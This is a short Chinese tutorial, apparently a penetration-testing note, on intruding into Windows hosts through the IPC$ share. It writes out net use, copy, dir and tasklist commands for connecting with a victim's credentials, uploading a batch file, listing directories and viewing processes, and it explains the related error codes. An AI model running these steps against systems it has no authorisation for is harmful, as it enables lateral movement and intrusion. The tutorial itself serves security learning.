IPC简介
IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
利用条件
管理员开启了默认共享
知道受害者的IP和登录密码
开启了139、445端口IPC入侵
创建IPC$连接
net use \\IP\ipc$ <PASSWORD> /user:<USERNAME>上传文件
copy C:\Users\Box\Desktop\calc.bat \\ip\C$列出对方目录
dir \\ip\c$tasklist 查看进程
tasklist /S ip /U username /P passwd断开连接
net use \\ip\ipc$ /del错误号
1.错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
2.错误号51,Windows 无法找到网络路径 : 网络有问题;
3.错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
4.错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 5.错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
6.错误号1326,未知的用户名或错误密码 : 原因很明显了;
7.错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
8.错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。计划任务
可以参考teamssix佬的文章
https://teamssix.com/210802-181052#toc-heading-2
更详细的介绍:
